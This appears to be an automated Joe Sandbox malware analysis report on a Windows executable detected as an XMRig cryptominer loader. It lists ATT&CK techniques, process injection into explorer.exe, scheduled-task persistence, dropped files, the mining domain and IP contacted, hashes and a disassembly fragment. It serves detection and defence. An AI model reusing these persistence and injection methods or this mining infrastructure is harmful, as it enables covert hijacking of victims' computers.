              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Windows Service1Windows Service1Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection712Virtualization/Sandbox Evasion111LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Process Injection712Security Account ManagerVirtualization/Sandbox Evasion111SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 513056 Sample: pcNCraWcRk Startdate: 01/11/2021 Architecture: WINDOWS Score: 100 58 xmr.givemexyz.in 2->58 64 Sigma detected: Xmrig 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 6 other signatures 2->70 11 pcNCraWcRk.exe 2->11         started        14 services64.exe 2->14         started        signatures3 process4 signatures5 90 Writes to foreign memory regions 11->90 92 Allocates memory in foreign processes 11->92 94 Creates a thread in another existing process (thread injection) 11->94 16 conhost.exe 5 11->16         started        96 Antivirus detection for dropped file 14->96 98 Multi AV Scanner detection for dropped file 14->98 19 conhost.exe 6 14->19         started        process6 file7 50 C:\Users\user\AppData\...\services64.exe, PE32+ 16->50 dropped 52 C:\Users\...\services64.exe:Zone.Identifier, ASCII 16->52 dropped 22 cmd.exe 1 16->22         started        24 cmd.exe 1 16->24         started        54 C:\Users\user\AppData\...\sihost64.exe, PE32+ 19->54 dropped 72 Injects code into the Windows Explorer (explorer.exe) 19->72 74 Writes to foreign memory regions 19->74 76 Modifies the context of a thread in another process (thread injection) 19->76 78 2 other signatures 19->78 27 sihost64.exe 19->27         started        29 explorer.exe 19->29         started        signatures8 process9 signatures10 31 services64.exe 22->31         started        34 conhost.exe 22->34         started        80 Uses schtasks.exe or at.exe to add and modify task schedules 24->80 36 conhost.exe 24->36         started        38 schtasks.exe 1 24->38         started        82 Antivirus detection for dropped file 27->82 84 Multi AV Scanner detection for dropped file 27->84 86 Writes to foreign memory regions 27->86 88 2 other signatures 27->88 40 conhost.exe 2 27->40         started        process11 signatures12 108 Writes to foreign memory regions 31->108 110 Allocates memory in foreign processes 31->110 112 Creates a thread in another existing process (thread injection) 31->112 42 conhost.exe 2 31->42         started        process13 file14 56 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 42->56 dropped 100 Injects code into the Windows Explorer (explorer.exe) 42->100 102 Writes to foreign memory regions 42->102 104 Modifies the context of a thread in another process (thread injection) 42->104 106 Injects a PE file into a foreign processes 42->106 46 explorer.exe 42->46         started        signatures15 process16 dnsIp17 60 198.23.214.117, 49763, 8080 AS-COLOCROSSINGUS United States 46->60 62 xmr.givemexyz.in 46->62 114 System process connects to network (likely due to code injection or exploit) 46->114 116 Query firmware table information (likely to detect VMs) 46->116 signatures18 118 Detected Stratum mining protocol 60->118

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              pcNCraWcRk.exe65%VirustotalBrowse
              pcNCraWcRk.exe31%MetadefenderBrowse
              pcNCraWcRk.exe81%ReversingLabsWin64.Trojan.Donut
              pcNCraWcRk.exe100%AviraTR/Agent.wbqui

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraTR/Agent.ywcqa
              C:\Users\user\AppData\Local\Temp\services64.exe100%AviraTR/Agent.wbqui
              C:\Users\user\AppData\Local\Temp\services64.exe65%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\services64.exe31%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\services64.exe81%ReversingLabsWin64.Trojan.Donut
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys1%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys3%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys4%ReversingLabs
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe49%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe82%ReversingLabsWin64.Trojan.Donut

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              17.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
              18.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
              17.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File

              Domains

              SourceDetectionScannerLabelLink
              xmr.givemexyz.in16%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://xmrig.com/benchmark/%s0%URL Reputationsafe
              https://xmrig.com/wizard0%URL Reputationsafe
              https://xmrig.com/wizard%s0%URL Reputationsafe
              https://xmrig.com/docs/algorithms0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr.givemexyz.in
              		212.114.52.24
              		truetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://xmrig.com/benchmark/%sconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://xmrig.com/wizardconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmpfalse
                		high
                https://xmrig.com/wizard%sconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://xmrig.com/docs/algorithmsconhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                198.23.214.117
                		unknownUnited States
                		36352AS-COLOCROSSINGUStrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:513056
                Start date:01.11.2021
                Start time:18:19:07
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 29s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:pcNCraWcRk (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.evad.mine.winEXE@26/6@2/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 63.1% (good quality ratio 52.4%)
                • Quality average: 41.6%
                • Quality standard deviation: 27.2%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 8.248.119.254, 8.238.85.254, 8.248.137.254, 8.241.126.249, 8.248.99.254, 173.222.108.147, 173.222.108.226
                • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net
                • Not all processes where analyzed, report is missing behavior information

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:20:03API Interceptor1x Sleep call for process: pcNCraWcRk.exe modified
                18:20:07API Interceptor4x Sleep call for process: conhost.exe modified
                18:20:09Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                18:20:10API Interceptor2x Sleep call for process: services64.exe modified
                18:20:13API Interceptor1x Sleep call for process: sihost64.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                xmr.givemexyz.inoracleservice.exeGet hashmaliciousBrowse
                • 212.114.52.24
                nazi.exeGet hashmaliciousBrowse
                • 194.5.249.24

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                AS-COLOCROSSINGUSAnnouncement.xlsxGet hashmaliciousBrowse
                • 198.46.132.212
                Swift Transfer - Failure.xlsxGet hashmaliciousBrowse
                • 192.227.158.116
                Inquiry files_00123.xlsxGet hashmaliciousBrowse
                • 198.23.213.2
                flv0110121.xlsxGet hashmaliciousBrowse
                • 198.23.213.2
                Document.exeGet hashmaliciousBrowse
                • 107.175.32.198
                Booking.xlsxGet hashmaliciousBrowse
                • 107.172.75.205
                SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                xE9 Players Full Profiles.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                RFQ DTD011121- FAMORITALIA.xlsxGet hashmaliciousBrowse
                • 107.173.191.112
                NEW ORDER (001) P000000000000 D02.xlsxGet hashmaliciousBrowse
                • 192.227.158.118
                scan_documents.xlsxGet hashmaliciousBrowse
                • 107.172.75.205
                VuMhXFFSwX.exeGet hashmaliciousBrowse
                • 23.94.183.146
                4oPbyzyFDC.rtfGet hashmaliciousBrowse
                • 192.227.228.38
                new order sheet 0016.xlsxGet hashmaliciousBrowse
                • 198.23.212.136
                agreement.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                • 198.46.199.161
                new oder sheet 0015.xlsxGet hashmaliciousBrowse
                • 198.23.212.136
                Statement of Account for OCTOBER 2021pdf.exeGet hashmaliciousBrowse
                • 23.95.115.74
                RPA Purchase Order.xlsxGet hashmaliciousBrowse
                • 107.172.13.131
                008.xlsxGet hashmaliciousBrowse
                • 198.23.212.136

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysFreeForYou.exeGet hashmaliciousBrowse
                  A3aCLmM4IV.exeGet hashmaliciousBrowse
                    Software patch by Silensix.exeGet hashmaliciousBrowse
                      96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exeGet hashmaliciousBrowse
                        sWSfbao3sR.exeGet hashmaliciousBrowse
                          Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                            LauncherHack.exeGet hashmaliciousBrowse
                              Hack.exeGet hashmaliciousBrowse
                                ixijzt2mxt.exeGet hashmaliciousBrowse
                                  GTA5TerrorMM.exeGet hashmaliciousBrowse
                                    FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                      Injector.exeGet hashmaliciousBrowse
                                        Injector.exeGet hashmaliciousBrowse
                                          61BoDeKl0u.exeGet hashmaliciousBrowse
                                            ShinChangerFort.exeGet hashmaliciousBrowse
                                              Sapphire.exeGet hashmaliciousBrowse
                                                p5x6Tk5245.exeGet hashmaliciousBrowse
                                                  install.exeGet hashmaliciousBrowse
                                                    wpXW8288lr.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Trojan.InjectNET.14.313.exeGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):539
                                                        Entropy (8bit):5.348465763088588
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                                        MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                                        SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                                        SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                                        SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                        C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2234368
                                                        Entropy (8bit):7.999681283638092
                                                        Encrypted:true
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
                                                        MD5:0958FA69BA0E6645C42215C5325D8F76
                                                        SHA1:800666827E118CE78AEF55C47864512EF9D3B7A6
                                                        SHA-256:1B0C9F3F22D25CD518E480798EE44E8876107B2D37B2E92997C039D4A6C69DB1
                                                        SHA-512:95F582F9B45325951FE4CDC40CD5AE1037A955E437C052C64186641785F8170C7C9CB9532756166E267F0398217991C616AD86115EBB8D0B183898887950CC28
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Virustotal, Detection: 65%, Browse
                                                        • Antivirus: Metadefender, Detection: 31%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......~".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\services64.exe:Zone.Identifier
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):14544
                                                        Entropy (8bit):6.2660301556221185
                                                        Encrypted:false
                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Joe Sandbox View:
                                                        • Filename: FreeForYou.exe, Detection: malicious, Browse
                                                        • Filename: A3aCLmM4IV.exe, Detection: malicious, Browse
                                                        • Filename: Software patch by Silensix.exe, Detection: malicious, Browse
                                                        • Filename: 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe, Detection: malicious, Browse
                                                        • Filename: sWSfbao3sR.exe, Detection: malicious, Browse
                                                        • Filename: Fortnite Hack Mod v1.4.exe, Detection: malicious, Browse
                                                        • Filename: LauncherHack.exe, Detection: malicious, Browse
                                                        • Filename: Hack.exe, Detection: malicious, Browse
                                                        • Filename: ixijzt2mxt.exe, Detection: malicious, Browse
                                                        • Filename: GTA5TerrorMM.exe, Detection: malicious, Browse
                                                        • Filename: FANDER_MOD V3.03.exe, Detection: malicious, Browse
                                                        • Filename: Injector.exe, Detection: malicious, Browse
                                                        • Filename: Injector.exe, Detection: malicious, Browse
                                                        • Filename: 61BoDeKl0u.exe, Detection: malicious, Browse
                                                        • Filename: ShinChangerFort.exe, Detection: malicious, Browse
                                                        • Filename: Sapphire.exe, Detection: malicious, Browse
                                                        • Filename: p5x6Tk5245.exe, Detection: malicious, Browse
                                                        • Filename: install.exe, Detection: malicious, Browse
                                                        • Filename: wpXW8288lr.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Trojan.InjectNET.14.313.exe, Detection: malicious, Browse
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):31232
                                                        Entropy (8bit):7.562503947370134
                                                        Encrypted:false
                                                        SSDEEP:384:VBTkmAadBYV6qxjqoz9EFEJNsoZuKVAWIL47zbMluB8qywZfH2pUq:kqjhWN6Fayodnm47zbMluB8U2pU
                                                        MD5:2497F634A80476AE2EAE956D8B84528E
                                                        SHA1:37DC97DFDA569615F036C7B3F74732231C9772E7
                                                        SHA-256:91EFE614A81B0E8F15EF7814CEB90DA038E6FDA29AAB733E53D8E3B49706B9BE
                                                        SHA-512:228F42E993F4089223ECDA317DCED1C8274CBAE75667478F43D31F9CF39DF35F62BE19624E24C39E2D4980C3174E6ED4BB2214F0383491AF862BF4681FBDAD35
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Metadefender, Detection: 49%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@......................................|......................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.999681283638092
                                                        TrID:
                                                        • Win64 Executable (generic) (12005/4) 74.80%
                                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                                        • DOS Executable Generic (2002/1) 12.47%
                                                        • VXD Driver (31/22) 0.19%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                        File name:pcNCraWcRk.exe
                                                        File size:2234368
                                                        MD5:0958fa69ba0e6645c42215c5325d8f76
                                                        SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
                                                        SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
                                                        SHA512:95f582f9b45325951fe4cdc40cd5ae1037a955e437c052c64186641785f8170c7c9cb9532756166e267f0398217991c616ad86115ebb8d0b183898887950cc28
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......~"....................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4022fa
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:02549ff92b49cce693542fc9afb10102

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        dec eax
                                                        mov ebp, esp
                                                        dec eax
                                                        sub esp, 00000040h
                                                        dec eax
                                                        mov eax, 00000004h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        dec ecx
                                                        mov eax, eax
                                                        mov eax, 00000000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3421h
                                                        dec eax
                                                        lea eax, dword ptr [FFFFFF98h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB343Fh
                                                        mov eax, 00000001h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB3437h
                                                        mov eax, 00030000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        mov eax, 00010000h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3424h
                                                        dec eax
                                                        mov eax, dword ptr [00220624h]
                                                        dec eax
                                                        mov ecx, dword ptr [00220625h]
                                                        dec eax
                                                        mov edx, dword ptr [00220626h]
                                                        dec eax
                                                        mov dword ptr [ebp-10h], eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec eax
                                                        mov dword ptr [esp+20h], eax
